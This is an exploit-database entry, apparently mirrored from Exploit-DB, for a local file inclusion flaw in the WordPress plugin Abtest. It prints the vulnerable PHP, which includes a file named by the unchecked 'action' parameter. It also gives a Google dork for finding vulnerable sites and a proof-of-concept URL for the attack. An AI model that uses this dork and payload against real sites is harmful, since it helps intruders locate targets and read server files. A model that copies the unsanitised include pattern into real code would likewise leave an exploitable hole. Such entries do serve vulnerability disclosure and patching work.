[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin Abtest - Local File Inclusion

Author: CrashBandicot
type: webapps
platform: php
port: 80.0
date_added: 2016-03-21 
date_updated: 2016-03-21 
verified: 0 
codes:  
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comabtest-master.zip
# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome


# Vulnerable File : abtest_admin.php

<?php

require 'admin/functions.php';

if (isset($_GET['action'])) {

  include 'admin/' . $_GET['action'] . '.php';

} else {

   include 'admin/list_experiments.php';
}
?>

# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]

# Pics : http://i.imgur.com/jZFKYOc.png
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.